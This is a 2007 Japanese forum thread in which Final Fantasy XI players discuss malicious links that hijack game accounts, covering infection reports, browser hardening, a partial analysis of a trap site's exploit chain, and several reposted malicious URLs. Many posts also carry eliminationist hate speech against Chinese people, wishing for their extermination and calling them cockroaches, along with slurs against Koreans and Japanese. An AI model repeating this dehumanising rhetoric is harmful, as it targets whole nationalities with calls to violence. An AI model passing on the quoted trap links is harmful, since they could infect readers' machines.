141 :既にその名前は使われています:2007/10/15(月) 14:32:41.19 ID:5jeF8Si1
つうか、まず基本的なことを確認させてくれ
htmlのページのみを表示している限り、基本的にはスパイウェアがPCに進入する事は無いよな?
JAVAスクリプトやアクティブXなんてものを使うからこの手のワーム等をPCに進入させてしまう
次にダウンロードするだけでは問題は無く、実行ファイルを起動しメモリに常駐されなければ大丈夫
HDDからウィルスが見つかってもそれが実行されていなければ問題は無いって事だよな?
ただ、ダウンロードとファイルの起動を普通は一緒にやる
つう事であってる?
142 :既にその名前は使われています:2007/10/15(月) 14:40:43.30 ID:rkSOYpl1
>>141
まぁまぁあってる。だからアクテイブXコンポーネントは、DL時に通知する設定にしてあったら拒否れば
いいだけ、JAVAはきっておけば動作しない。ちなみに実行ファイルを起動じゃなくてスクリプトなり
コンポーネントなりをあっちで呼びだされたらアウト。
DLしてある、インスコしてある、そしたらもうアウトww
実行形式のよくある「ロリロリ幼女.zip .exe」を実行しちゃった系とは
感染経路が違う。JAVAは実行許可してあるブラウザ(種別問わず)で読み込まれた時点で
アクティブXはDLされた時点でアウト。
JAVAアプレットはオフ、アクティブXはDL通知or拒否にしておく。
なんのためにアクティブXコンポーネントに証明書なんてついてるか、って点を考えてみてよw
143 :既にその名前は使われています:2007/10/15(月) 14:46:26.20 ID:5jeF8Si1
>>142
THX
大体分かったと思う
アクティブXって物をよく知らないんだが、
exeさえ踏んで実行しなければ何て問題じゃないんだね
144 :既にその名前は使われています:2007/10/15(月) 14:50:06.65 ID:5jeF8Si1
それから、画像ファイルを踏んだら感染したなんて話をよく聞くけど、
画像ファイルはスクリプトみたいな物として読み込まれるって事あるの?
ビュアーでただ表示される物だと思っていたけど・・・
145 :既にその名前は使われています:2007/10/15(月) 14:51:40.96 ID:qY7JMJ4h
>>143はもっと基本を勉強するべき
146 :既にその名前は使われています:2007/10/15(月) 14:51:44.04 ID:8tc1ZXLJ
jpgに偽装してるウィルスだかなんだかってちょい前に流行らなかったっけ?
147 :既にその名前は使われています:2007/10/15(月) 14:56:33.39 ID:CHaMhoOs
てゆうかうちのブログにはられていたのはjpg偽装
削除クリックしようとして隣のURL踏んじゃって涙目wwwwwwwww
148 :既にその名前は使われています:2007/10/15(月) 14:57:18.90 ID:uWYBlKZL
うぃんどうずwの脆弱性かなんかだったような>JPGバグ
149 :既にその名前は使われています:2007/10/15(月) 14:58:18.42 ID:Pvh73KqA
業者も見境ないなぁ。ゲーム内で稼げなくなったら今度は本当に泥棒するとは。
150 :既にその名前は使われています:2007/10/15(月) 15:00:03.41 ID:5jeF8Si1
>>145
俺自身そう思う
つうか、勉強できる良い教材とか無い?
151 :既にその名前は使われています:2007/10/15(月) 15:01:47.71 ID:5jeF8Si1
>>148
つう事はWindowsアップデートでWindowsを最新にしていれば現在は直ってる?
152 :既にその名前は使われています:2007/10/15(月) 15:03:55.82 ID:dfrmZ1dK
>>151
既知の問題に対しては平気だと思うが、まだ露呈してない穴を突かれたらアウト。
153 :既にその名前は使われています:2007/10/15(月) 15:07:22.91 ID:bz8tbAi9
とりあえず昨日俺が践んでからの流れを書いてみる
1、ブラウザはスレイプニルでブログのコメントにあったFF関連のURLをクリック
2、タブにはIEと出てブラウザには何も表示されずウイルスバスターが「ウイルスの隔離に失敗した」と警告
3、すぐにウイルススキャンのみをし、1つ発見し隔離後削除
4、スパイウェアとセキリティホールとウイルススキャンをもう一度したが何も見つからず
これが昨日の夜の出来事
そしてこのスレを今日みつけた(´・ω・`)
154 :既にその名前は使われています:2007/10/15(月) 15:08:57.48 ID:rkSOYpl1
>>143
アクティブXコントロールを無制限に許可してる=EXEを自動でDL実行を裏でさせている。
分かったら今から手動で許可するに設定しなおすんだw大手サイトで
安全と分かってる所ならいいよ例えばyahooだったりgoogleだったり頻繁に使ってる通販サイトならね。
オレはセブンイレブン.comとかDVDダイレクトかな、そこからもちろん個人情報の流出がないか?
と問われれば100%とは絶対言えない、でも利便性とセキュアさとのトレードオフだからねネットサーフは。
ただ確実に言えるのはオレはこの方法でウイルス踏んでPC飛んだ事1回もないよブラクラもない。
ま、事前にドメインみたらチョンコのサイトぽいのは踏まないとかしてるのもあるけど。
1回だけavast!のワーニング出たかな、それだけだよw
155 :既にその名前は使われています:2007/10/15(月) 15:11:13.83 ID:FrFc9auW
ファイアフォックスでもアクティブXの設定出来るのかね?
156 :既にその名前は使われています:2007/10/15(月) 15:12:54.59 ID:sWqjwt+8
>>140
そこまでやばそうなら、俺が変わりに変更しといて教えてやるといいたいところだが、それじゃさらに心配だろうなw
157 :既にその名前は使われています:2007/10/15(月) 15:19:24.62 ID:5jeF8Si1
>>154
THX
一応、署名されたアクティブXのダウンロードはダイアログ表示、
未署名のアクティブXのダウンロードは無効になっていた
つうか、アクティブXコントロールとプラグインの実行とか、気になるもの全てダイアログ表示にして
公式HP開いたらダイアログだらけでまともに見れなくなったwwww
158 :既にその名前は使われています:2007/10/15(月) 15:24:00.28 ID:lWvB4n6e
携帯版フレンドリストとかいつになったら出るのよ
159 :既にその名前は使われています:2007/10/15(月) 15:25:22.30 ID:g+W18b1S
>>13
そんなのごく一部だろ。
フレがやられたらしいが、金目の物売りさばかれたものの
エクレアや金にならん物は全て残ってたそうだぞ。
これもバハ鯖な。
160 :既にその名前は使われています:2007/10/15(月) 15:30:04.00 ID:2/MINvwD
11日付けでmixiにURLが張られ踏む。
XP、ノートンインターネットセキュリティ2007、Bagブラウザ使用。Javaは切ってあったはず。WindowsUpdateは最新。サイトは開いたが真っ白で、PCにも何の反応もなかった。
12日、13日で合計三回ショートカットからFF接続。日曜はやっていない。
15日昼、ここを見つけて青ざめる。
161 :既にその名前は使われています:2007/10/15(月) 15:36:37.40 ID:B7tApa1p
>>159
どちらの被害もありうるってことでしょ
一部かどうかなんてことこの際関係ない
162 :既にその名前は使われています:2007/10/15(月) 15:42:15.83 ID:g+W18b1S
>>161
>や、被害逢った複数のフレが全員同じパターンだ。
まるでこのパターンしかないような口調で書いてたから否定しただけだが
否定されると何か都合悪いのか?
163 :既にその名前は使われています:2007/10/15(月) 15:48:41.39 ID:8tc1ZXLJ
うちのフレも金目の物と金だけ抜かれてエクレアとかキャラとかは大丈夫だったみたいだなぁ。
まぁ金と金目の物盗られて大丈夫だったもクソもないんだが・・・w
164 :既にその名前は使われています:2007/10/15(月) 15:56:07.31 ID:OCxmGq9L
昨日自分のFFブログにコメントで貼られてて踏む。
.jpgで真っ白だったがソースが面白いことになってた。
でもMacOSXでしかWebは見ないので何の問題も無かった。
うちのFF11専用PCはノートンとFF11しか入ってねぇw
165 :既にその名前は使われています:2007/10/15(月) 16:10:16.66 ID:xr+6TcAm
安全サイトはIE、ある程度信頼できるサイトはタブブラウザを使っているが
やばいと思うサイト専用のブラウザは何がいいかな
軽いブラウザがいいんだが
166 :既にその名前は使われています:2007/10/15(月) 16:10:23.08 ID:q1vxKjR8
このスレか向こうのwikiスレが落ちるか完走しそうになったら、
ネ実セキュリティ総合スレとか立てたいねこりゃ。
167 :既にその名前は使われています:2007/10/15(月) 16:13:15.91 ID:csK5pGd7
RMTならまだしもここまで来ると完全に犯罪
もう後が無いんだろうな奴等も
168 :既にその名前は使われています:2007/10/15(月) 16:13:28.99 ID:bz8tbAi9
とにかく
・ウイルス、スパイウェアの駆除
・パス変更
これをやればいいのかな?
間に合えば・・・
169 :既にその名前は使われています:2007/10/15(月) 16:15:01.53 ID:OpMKEtp1
>>168
駆除したあと、なるべく駆除したPCとは別のPCかPS2あたりでパスかえたほうがいい。
見つかってないスパイウェアがまたデータ盗むかもしれんからな。
170 :既にその名前は使われています:2007/10/15(月) 16:15:30.88 ID:+nv1DEJ5
もう後が無いというか、日本の法律の影響を受けない場所からやってるんだろうから犯罪とか
そんな事奴らには関係ないんじゃない?
171 :既にその名前は使われています:2007/10/15(月) 16:16:00.99 ID:B7tApa1p
>>162
うがった見方し過ぎw
172 :既にその名前は使われています:2007/10/15(月) 16:16:47.91 ID:h6EficU/
感染の疑いがあるPCはとっとと捨てて新しいPCを買うしかない
173 :既にその名前は使われています:2007/10/15(月) 16:16:48.15 ID:+nv1DEJ5
>>169
つうか、その後永久にPCでログイン出来なくないか?
見つかってないスパイウェアが入ってるかもしれないし
174 :既にその名前は使われています:2007/10/15(月) 16:17:49.52 ID:L8P1+cRg
スレチだろうけど、買う奴がいるから奴らも形振り構わず奪いに来るんだよな。
もうRMTerは一発BANでいいよ。
175 :既にその名前は使われています:2007/10/15(月) 16:20:41.86 ID:Bc+bkhyB
ま、すこしでも怪しいサイトをみたけりゃマック使うのが確実だな
いまなら中古のそこそこの機種が5000円程度
それでネットの利用には十分すぎる性能だしな
176 :既にその名前は使われています:2007/10/15(月) 16:21:01.34 ID:dsX8B3pB
それこそ回線ぶちぬいて、出荷時の状態にクリーンインストールでおkだろう。
177 :既にその名前は使われています:2007/10/15(月) 16:21:25.76 ID:+nv1DEJ5
>>174
同意
買い手がいなければ奴らの行動は無意味になる
以前はそろそろ売り手が絶滅するだろうし、買いたきゃ勝手に買えばwww程度にしか考えてなかったが、
ここまで事体が深刻化すれば買い手も購入額、購入回数に関わらず全て1発BANの必要があるだろ
178 :既にその名前は使われています:2007/10/15(月) 16:23:35.09 ID:OpMKEtp1
>>173
一度ヤバイURL踏んだ後、アンチウィルスソフトじゃすべてをカバーするのは無理だろうし
定期的にパスかえるしかないんじゃないかな?
極論になると>>172になるな、一番安全。
しかし、現実は定期的にウィルススパイウェアを駆除するしかない
それでも垢ハックされた場合は運が悪かったとしか・・・GMにいっても救済されないっぽいしな
俺もやばいURL踏んで、スキャンしてそれでも心配だったからPCからFF11アンインストールして
PS2のみでやってるし。一応業者の活動が落ち着くまでPCにFF11はインストールしないつもりだよ
179 :既にその名前は使われています:2007/10/15(月) 16:23:59.27 ID:3tKa8ncI
俺も土曜ギコナビのURLにカーソルのせると画像見られる奴で真っ白の見ちゃったがやばいんだろうなぁと思って検索やら駆除やらしたなぁ
もうまとめサイト作って中国人非難したほうがよくないか?
調子に乗りすぎだと思う
180 :既にその名前は使われています:2007/10/15(月) 16:25:22.55 ID:qSShvntL
>>174
>>177
そりゃ単純すぎってもんだろ。
例えば俺が倉庫キャラでRMTしてそのギルを恨みある奴や
不特定多数に送付したら全員垢BANすんのか?
もしくはバザー品を購入してもよい。
証拠も無しにギルだけで垢BANてのは難しい&危険じゃないのか?
181 :既にその名前は使われています:2007/10/15(月) 16:25:35.77 ID:B7tApa1p
wikiでは改ざんされる恐れがあるし
まずはテンプレ作成からかね
182 :既にその名前は使われています:2007/10/15(月) 16:25:55.87 ID:3Tq99UU+
俺のブログにも変なトラックバックあったんだよな。
FFはPSからだから安心だがフレのキャラが心配だ。
183 :既にその名前は使われています:2007/10/15(月) 16:27:03.16 ID:8tc1ZXLJ
>>179
非難しようと何しようとやってくるよ。向こうは生活かかってるしなりふりかまってられない。
対策しようと穴見つけてつついてくる。
きれいごとな言い方かもしれないけど各個人でセキュリティ意識高めて防衛するしかないと思う。
184 :既にその名前は使われています:2007/10/15(月) 16:27:56.60 ID:+nv1DEJ5
FFも某ネットバンキングみたいな感じでワンタイムパスワードとかやってくれんかな・・・
俺も出来ればX箱360版に変えたいが、パッドがな・・・
アナログスティックやボタンの配列がPS2の配列のパッド出ないかな・・・
185 :既にその名前は使われています:2007/10/15(月) 16:28:23.39 ID:g+W18b1S
>>171
関係あるとか無いとか頓珍漢なレスしてるお前だろそれはw
元レスの内容が事実に添ってないからその部分を否定しただけ。
186 :既にその名前は使われています:2007/10/15(月) 16:29:31.04 ID:DGEp1aaS
つうか、オレの中での順位が変わりつつある。
この世から消滅してしまえばいい国
第一位:中国(北朝鮮を抜いてトップに躍り出た)
第二位:北朝鮮
第三位:韓国
12億人残らず消滅してくれないかな。
187 :既にその名前は使われています:2007/10/15(月) 16:29:51.54 ID:+nv1DEJ5
>>179
wikiにしてそのサイトまで改竄されたら笑いものだなwwwww
188 :既にその名前は使われています:2007/10/15(月) 16:29:53.57 ID:OWqw2Qhe
つまりインベーション見に行けってことか
http://wannabe.fam.cx/service/link.cgi?http://wwws.warnerbros.co.jp/theinvasion/site.htm
189 :既にその名前は使われています:2007/10/15(月) 16:31:15.88 ID:+nv1DEJ5
>>186
一番確実なのはあの国を人間ごとリアルから消し去る事だよな〜
NA様やってくれんかなwwww
190 :既にその名前は使われています:2007/10/15(月) 16:34:31.11 ID:Ih1S+Tsm
>>180
RMTer乙
穴ばっかり突いてないでさっさとBANされろ
191 :既にその名前は使われています:2007/10/15(月) 16:35:32.85 ID:B7tApa1p
>>185
>>161
【どちらの被害もありうる】ってことでしょ
【一部かどうかなんてことこの際】関係ない
他人の報告聞いて【ごく一部】と決めつけたのはあなた
それに対してのレスが>>161
人を頓珍漢呼ばわりする前に落ち着け
192 :既にその名前は使われています:2007/10/15(月) 16:35:55.42 ID:3tKa8ncI
知らない人に警鐘鳴らす意味でもあった方がいいと思う
あとは向こうの手口も進歩するんだしそれに応じた対策とか有志で持ち寄りでもあればなお良いと思う
193 :既にその名前は使われています:2007/10/15(月) 16:46:23.24 ID:ao8hXpgH
>>168
1.他のPC/PS2でパス変更
2.対象PCの再インストール
が最良、ツールは検出できない場合もあるしね
PCが無い場合は、スクエアのサポートに電話して
アカウントロック&パスワード再送依頼かな
感染したPCで何かやろうとすると危険だとおもわれ
194 :既にその名前は使われています:2007/10/15(月) 16:47:35.20 ID:qSShvntL
>>190
は?何でもRMTerて言えば良いのか?
穴があるから指摘しただけだろ
Rmtなんかしてねーよ。だが業者からギルもらっただけで垢BANなら
冤罪で垢Banやり放題ですねw
そんなゲームしたいのか?師ね低脳
195 :既にその名前は使われています:2007/10/15(月) 16:49:17.64 ID:bW9PV5tX
もう、バザー、競売、宅配廃止でwwwwww
196 :既にその名前は使われています:2007/10/15(月) 16:49:35.70 ID:g+W18b1S
>>191
馬鹿か…ちゃんと元レス>>13と>>14読んで来い。
お前の「どちらの被害もありうる」に対して否定はしないが
元レスは「こんなケースもあったよ」みたいなニュアンスで書いてないだろ?
どうみても「エクレア、キャラごと捨ててしまうのが当然のやり口」のように書いてるだろ?
だから、その部分について否定しただけ。
197 :既にその名前は使われています:2007/10/15(月) 16:50:45.64 ID:g+W18b1S
失礼 >>14じゃなくて>>23なw
198 :既にその名前は使われています:2007/10/15(月) 16:58:42.35 ID:8tc1ZXLJ
被害の大小でケンカすんなよw
199 :既にその名前は使われています:2007/10/15(月) 16:59:17.25 ID:B7tApa1p
>>196
それじゃあ俺が馬鹿で業者で頓珍漢でいいよ
こっちのことを業者と疑うようなレスつけといて何様だよあんた
200 :既にその名前は使われています:2007/10/15(月) 17:00:20.50 ID:g+W18b1S
まあ完全に子供の喧嘩だな・・・w
すまんかった。
201 :既にその名前は使われています:2007/10/15(月) 17:02:33.91 ID:N40mmryY
そして業者の策略にはまり日本人同士で喧嘩し始めるネ実であったwwwww
202 :既にその名前は使われています:2007/10/15(月) 17:04:31.26 ID:rkSOYpl1
小日本小日本喰糞喰糞^^
203 :既にその名前は使われています:2007/10/15(月) 17:11:53.91 ID:wEskqzSY
フレも被害にあい、さすがに怖くなったからPOLのパスワード設定を
「入力して保存する」から「設定しない」に変えて、ログインするごとに
入力する方法に変えたんだけど、今まで保存されていた場合、すでにどこかのファイルに
情報が入っちゃってて意味なかったりするのかな。
特別にどこかのファイルを消す必要があるとか知ってる人いたら教えてほしい。
204 :既にその名前は使われています:2007/10/15(月) 17:13:20.94 ID:sWqjwt+8
クッキーみたいに?
205 :既にその名前は使われています:2007/10/15(月) 17:18:06.74 ID:VrfuxxCC
おいィ?ネットポリスは何しつる訳?
206 :既にその名前は使われています:2007/10/15(月) 17:19:53.28 ID:8nd9bHW4
警察は真面目に動くの?
「は?ネトゲ?キメェwwwwww」な対応しかしないの?
207 :既にその名前は使われています:2007/10/15(月) 17:20:49.57 ID:C6HFP7H2
先鋭が中国行って、片っ端から鈍器でガツンとやってくればいつかは終わるさ
208 :既にその名前は使われています:2007/10/15(月) 17:23:48.36 ID:UbJ805qK
最近URLが張ってあって「両手武器が強くなってSTR=攻1 DEX=命中1などの検証〜」とか
「エキサイトブログのほうを閉じたのでこちらのほうでまたFF11Blog再開しまーす!リンクお願いします」とか
IPサーチすると北京と上海ばっかりwwwwwwwwwwwwwwwwwwwwwwwwwwww
ほんとなんとかしてほしいなぁ。
しかも似たようなリモートホストだったなぁ全部
209 :既にその名前は使われています:2007/10/15(月) 17:30:09.16 ID:LjSCbTSm
中華を皆殺しにしろまで言わん
アノ国をネット封鎖しろ
210 :既にその名前は使われています:2007/10/15(月) 17:37:00.61 ID:K4aIZTfZ
取りあえずネットやメールはMacでやれば問題ないって。
10万くらいのCore2Duoのノートブックで良いからさ。
HDの別パーテーションにXPやVISTAインストール出来るから
Winで作業する時はそっちで起動(FF11も普通に出来る)
ネットやメールや怪しいサイトはUNIXベースのOSXでアクセス。
アプリやゲームその他すべての面でWindowsのが今や上だけど
ことネット利用の安全性に関してはMacOSのが上だよ。
211 :既にその名前は使われています:2007/10/15(月) 17:38:42.14 ID:g+W18b1S
コメントの内容がFF関連だとしても、
自分の記事なりに直接関係する内容でなければ警戒するようになったな。
昔は気にせずURLクリックしてたけど…ほんとめんどいわw
212 :既にその名前は使われています:2007/10/15(月) 17:47:03.90 ID:s21KZTNg
jpgが危ないってことはフォト2とかの画像うpサイトってかなり危なくないか?
速攻攻撃対象になってそうなんだけど
213 :既にその名前は使われています:2007/10/15(月) 17:47:24.90 ID:82eWdTgD
ソースチェッカーとかいうの見つけたんだけど
踏む前にこういうのにかけてみれば
被害は防げるんかな
214 :既にその名前は使われています:2007/10/15(月) 17:50:46.74 ID:4xFQ67qj
>>165
opera
215 :既にその名前は使われています:2007/10/15(月) 17:54:56.00 ID:/fxEx+BR
被害に遭ったら、失ったアイテム補償などの救済はあるのか
@警察は、不正アクセスの被害者はサーバー管理者であるゲーム運営会社です、
とHPではっきり言っている
A■eはもちろん自ら被害者として告発はしないし、不正アクセスに関して、
警察の捜査等により事実関係が明確になれば、弊社は、お客様が被害に遭わ
れたと確信を持って対処できるのです、と言う
@とAを合わせると、理屈上は絶対に泣き寝入りしかない理屈になる
補償を行っていると言うリネの運営なんかはどう動いてるんだろうね
216 :既にその名前は使われています:2007/10/15(月) 18:05:28.26 ID:mtBUfr0j
ドリキャスでネットすれば安心だぞ
217 :既にその名前は使われています:2007/10/15(月) 18:06:02.71 ID:6xAcG0G9
このスレはアゲルべき
218 :既にその名前は使われています:2007/10/15(月) 18:09:39.67 ID:8QSEwqs6
>>210
デュアルブートは重くないか?
そう思ってたんだけど、今は違うのかしら
219 :既にその名前は使われています:2007/10/15(月) 18:14:03.99 ID:SoRTAx6m
FF11史上の最も強い日記
詳しい情況は見る
http://wannabe.fam.cx/service/link.cgi?http://tinyurl.com/35vg2o
75 名前:既にその名前は使われています[] 投稿日:2007/10/15(月) 18:01:07.88 ID:JIMp2RWF
FF11/FFXI全く新しいです武器.防具一覧
詳細はリンク先ページを参照下さい。
http://wannabe.fam.cx/service/link.cgi?http://tinyurl.com/33oht5
踏んじゃったんだけど
220 :既にその名前は使われています:2007/10/15(月) 18:18:19.75 ID:8tc1ZXLJ
>>219
だからURLは削れと・・・二次被害出るぞ
221 :既にその名前は使われています:2007/10/15(月) 18:18:37.48 ID:Bc+bkhyB
>>210
ネットとメールするのにそんなんまでいらんよw
5000円の中古で十分。マカーは割りと物持ちがいいのが多いから状態も悪くないのが多いしね
222 :既にその名前は使われています:2007/10/15(月) 18:19:44.26 ID:HnIOHfEY
1 名前:既にその名前は使われています[sage] 投稿日:2007/10/08(月) 15:13:00.62 ID:qbkt1Ge6
=================================
注意:ジョブwikiなどが業者に狙われています。
=================================
なんかアカウントハック目的の業者うざいのでネ実のマンパワーでFFXI系wikiをまもれ。
とりあえず現在、tinyurl系がうざい。 うっかり踏まないように。
あと一般のブログに見える業者のLivedoorブログページに一度飛ばし、
アルタナの神兵情報などを載せて「詳しくはこちら」からハックHPに飛ばす手法もある。
怪しいURLは先にこれで調べる!これが勝利のカギだ!
■aguse.net
http://wannabe.fam.cx/service/link.cgi?http://www.aguse.net/
現在防衛すべきwiki
■モンク道
http://wannabe.fam.cx/service/link.cgi?http://mnk4.no-ip.org/?FrontPage
Wikiスレの>>1に書いてるサイトから危険度をチェックすれ、きっと笑える結果が待ってる
223 :既にその名前は使われています:2007/10/15(月) 18:25:39.00 ID:nU3SrfAM
やつら、自炊スレにまで転送アドレス貼りにきたよ。
aguse.netで調べたら案の定China・・・
224 :既にその名前は使われています:2007/10/15(月) 18:33:39.36 ID:8tc1ZXLJ
aguse.netって便利だな。FF関連のリンク踏むときはここ通して調べるといいのか・・・。
調べようとして間違って踏んじゃったりする可能性が一番怖い・・・
225 :既にその名前は使われています:2007/10/15(月) 18:33:46.15 ID:xBJ5t7Gd
なあアカウントハックって.exe 実行型?
それによって対処の仕方とか考えるぜ
226 :既にその名前は使われています:2007/10/15(月) 18:35:08.72 ID:C6HFP7H2
田代に踏みに行かせるは・・・
227 :既にその名前は使われています:2007/10/15(月) 18:42:47.04 ID:aFtld5Tu
冷静に考えてだな、汗水たらして必死に働いたのに
元々内陸部は土地が痩せているし、近年急激な環境破壊が進んでいて
ろくな収穫が無い。
だから沿岸部へ出稼ぎに行くわけだけど、
椅子に座ったまま上司から指示された通りにパソコンいじってれば
お金がもらえるんだから、もう農家なんかやってないで
RMT業者の手先になっちゃったほうがよほど楽して稼げるんですよ。
業者の侵攻が止むわけ無いわな。
228 :既にその名前は使われています:2007/10/15(月) 18:44:32.38 ID:8I8GSgcK
九五と二百十九は削除依頼してきたが
任意削除なんで削除してもらえるかは不明。
古いデータだけど
ttp://arena.nikkeibp.co.jp/article/col/20050510/112145/
ノーガードでネットつなぐとこんなことになるって例。
現在の現象はモスレにはってあったこれがわかりやすかった
ttp://jp.trendmicro.com/jp/threat/trend/web-threats/
PCでFFしなくても 銀行の口座やクレカ
他の会員制サイトのIDとパスなんかも抜かれる可能性があるから
フリーのスキャンだけでもしといたほうがいいぜ?
229 :既にその名前は使われています:2007/10/15(月) 18:45:39.21 ID:W/MTsceV
ここで聞くことじゃないがマルチ張られてたらアンカ飛ばして警告したほうが良い?
230 :既にその名前は使われています:2007/10/15(月) 18:49:38.04 ID:e2/Ys8hX
PS2でやれ
231 :既にその名前は使われています:2007/10/15(月) 18:54:42.83 ID:fWWms7Ms
>>220
それが目的だろ、巻き添えにしたいだけ
232 :既にその名前は使われています:2007/10/15(月) 18:54:50.93 ID:BV3pGnPR
>>228
おまえさん、削除依頼だすとこまちがってるw
233 :既にその名前は使われています:2007/10/15(月) 19:02:31.98 ID:HnIOHfEY
上で踏んでしまった連中見てると「自称ネットに慣れてる」「俺は大丈夫」と思ってる奴らの多さがよくわかる。
他人事じゃないのにな。
234 :既にその名前は使われています:2007/10/15(月) 19:03:38.20 ID:GK+JQ8M3
PS2はマクロのバックアップを取れないというのが致命的すぐる
235 :既にその名前は使われています:2007/10/15(月) 19:06:23.64 ID:nE6qcWLq
中国人は他国に迷惑かけすぎだろ
236 :既にその名前は使われています:2007/10/15(月) 19:07:33.41 ID:dsX8B3pB
妹がマクロをPS2からPC版に移すにあたって、写メでパシャパシャやってたのを思い出した。
手動なのは諦めるしかないんだと思う。
237 :既にその名前は使われています:2007/10/15(月) 19:16:52.61 ID:GK+JQ8M3
メモリーカードにファイルとして出力くらいできてもいいとは思うんだけどなー
238 :既にその名前は使われています:2007/10/15(月) 19:18:20.57 ID:C6HFP7H2
中国人なんか死んだら捨てるくらいのスタンスでいいんだから
他国に迷惑かけてまで生き長らえようとしなくていいのに^^;
239 :既にその名前は使われています:2007/10/15(月) 19:20:35.40 ID:v/fxvPpp
いまphotoIIを開いて閉じると音が鳴る。
これって何か仕込まれてるんだろうか。
240 :既にその名前は使われています:2007/10/15(月) 19:20:48.18 ID:W/MTsceV
あの国の人間て爆発的な速度で増殖してるからな。
まじでゴキ以下だわ。
241 :既にその名前は使われています:2007/10/15(月) 19:21:50.51 ID:Tlw1uPPJ
リンク貼ってよ
半角板で判定してもらおう
242 :既にその名前は使われています:2007/10/15(月) 19:28:27.95 ID:8FldlluB
これ2chでURL貼られてたら貼った奴逮捕できんの?
鯖スレで晒されてる奴の情報とか偽って貼ってた愉快犯がいるんだが
243 :既にその名前は使われています:2007/10/15(月) 19:39:57.36 ID:DL6f46Yu
このスレ見てとりあえずウイルスバスターで
IDとパスをweb、メール経由で送信ブロック設定した
244 :既にその名前は使われています:2007/10/15(月) 19:46:33.56 ID:Bc+bkhyB
プロバイダ法に違反しそうだけど管理人しだいかな
245 :既にその名前は使われています:2007/10/15(月) 19:50:13.91 ID:s21KZTNg
tp://ff11-photo.gamers-online.net/joyfulyy/joyfulyy.cgi
246 :既にその名前は使われています:2007/10/15(月) 20:44:54.65 ID:CHaMhoOs
ほんとどうしょうもないな中国人は・・・
247 :既にその名前は使われています:2007/10/15(月) 20:48:04.27 ID:v/fxvPpp
PhotoIIはラウンジの鑑定人によると無害らしい。
ソースチェッカーでもほぼ安全という結果だった。
別の要因で鳴っただけかもしれないのでお騒がせごめん。
248 :既にその名前は使われています:2007/10/15(月) 20:52:40.86 ID:OpMKEtp1
ネ実のスレにも罠URL入ってるシナチクがいるな。
マジで中国をネット封鎖してくれ、地球にいるゴキブリだよ奴らは
249 :既にその名前は使われています:2007/10/15(月) 20:54:39.75 ID:OpMKEtp1
ちなみにそいつのIDはID:JIMp2RWFな。
見つけたら即あぼーん汁。
連レス失礼。
250 :既にその名前は使われています:2007/10/15(月) 20:56:02.54 ID:W/MTsceV
>>249
金策スレとかにも張ってるなそいつ
251 :既にその名前は使われています:2007/10/15(月) 21:01:30.47 ID:N/NKXwEE
IEとは独立したOS側(win)の脆弱性をつくurlも存在するようで、
とりあえずOpera,Mozzila使用者も油断は禁物かもしれません。
ActiveX、VBScriptが無効でもjavascript+OS脆弱性で感染する可能性があります。
11日付近に張られているurlは割と古い脆弱性を標的にしているようなので、
windowsupdateとウィルス対策をきちんとしていればある程度は防げるかも?
もちろん油断は禁物ですが。
割と多くのアンチウィルスソフトベンダが対応しているみたいなので
リアルタイム(オンアクセス)スキャンやインタースキャン等なら防げるのかもしれませんね。
(今後も安心という保障は全くありませんが)
windowsupdateを無効にしている人やリアルタイムスキャンを(重いので)無効にして定期スキャンのみにしてる人、期限切れで定義ファイル更新してない人はベンダーhpの無料オンラインスキャンを試してみるのもテです。
252 :既にその名前は使われています:2007/10/15(月) 21:01:41.69 ID:3tKa8ncI
シナチク警戒上げ
253 :既にその名前は使われています:2007/10/15(月) 21:12:30.26 ID:S9ceHPEO
田代砲って有効かな?
254 :既にその名前は使われています:2007/10/15(月) 21:16:17.45 ID:dsX8B3pB
初心者スレにもなんか来てた。
h ttp://www●k5dionne●com/ffxmmi
例によって危険URLリストに載ってた。
255 :既にその名前は使われています:2007/10/15(月) 21:20:31.97 ID:cG0A2xWz
死な畜がログイン出来ない様にチャイナからのアクセス封鎖すればいいじゃね?w
256 :既にその名前は使われています:2007/10/15(月) 21:32:02.24 ID:c9x2X3gl
>>218
ディアルブートがなんで重くなるのかが気になるw
257 :既にその名前は使われています:2007/10/15(月) 21:39:06.09 ID:kH8lrXBT
>例えば俺が倉庫キャラでRMTしてそのギルを恨みある奴や
>不特定多数に送付したら全員垢BANすんのか?
どこの誰かも分からない奴から送られてきたギルを、そのまま貰う様な奴はBANされていいんじゃね?
つか、その前に送付元のお前がBANされそうだけどなwww
258 :既にその名前は使われています:2007/10/15(月) 21:50:26.67 ID:fJZUO+Gb
>>214
Ver6以降、使いやすくなったよな
昔は日本語さえなかった
259 :既にその名前は使われています:2007/10/15(月) 22:04:39.01 ID:LM2abMLO
>>256
WindowsにLinuxが合わさると頭がおかしくなって死ぬ
260 :既にその名前は使われています:2007/10/15(月) 22:14:32.17 ID:Oid4nZ/A
とりあえずテンプレは>>222のサイトを載せるべきかね
261 :既にその名前は使われています:2007/10/15(月) 23:41:58.89 ID:dsX8B3pB
aguse.netとソースチェッカー系からどっかお勧めのやつと、
あとなんだっけ、リネージュ資料室のセキュリティ対策を乗せといたらいいんでないかな。
http://wannabe.fam.cx/service/link.cgi?http://lineage.nyx.bne.jp/misc/security/
262 :既にその名前は使われています:2007/10/16(火) 00:11:00.60 ID:hJRBS4Zx
とりあえず、攻撃収まるか対策されるまで、
FFやるPCではどんなリンクも踏まないのが一番手堅い
263 :既にその名前は使われています:2007/10/16(火) 00:56:44.04 ID:gf+9scve
まだ途中なんだけど >>95 の罠サイトを解析してみた
※この書込み情報自体もまず疑って掛かってください。間違っている可能性があります。
※もっと、詳しい方の添削をお願いします。
tp://www(ドット)xiaoriben(ドット)net/FFXI/index.htm
index.htm (frameで呼出)
┣ wz.htm
┗ wu.htm (iframeで呼出)
┣ vip.htm
┗ kiss.htm
vip.htm のバッファオーバーフローは恐らく↓かな?
もしこれなら 『BaoFeng Storm』 と言うソフトウェアがインストールされていなければ(MPS.dllがなければ)平気ぽい
ttp://www.symantec.com/ja/jp/enterprise/security_response/vulnerability.jsp?bid=25601
kiss.htm は、恐らく↓の脆弱性をついた物だと思われ。2006/04 のだから普通に Windows Up Date
をしていれば問題ないはず
ttp://www.microsoft.com/japan/technet/security/Bulletin/MS06-014.mspx
kiss.htm は "ser.exe" というのをダウンロードさせて "svchost.exe" にリネームして
実行していると思われ
ser.exe は、残念ながら自分には DL できなかったので、動作は不明(恐らくダウンローダだとは思う)
264 :既にその名前は使われています:2007/10/16(火) 01:08:03.51 ID:ls39jOq+
f2c,exciteへの爆撃がヒドイ
ふつーのスパムとかトラバ嵐と違って結構紛らわしい本文なので注意が必要です。
↓サンプル
------------------------------
エキサイトブログが壊れた模様です
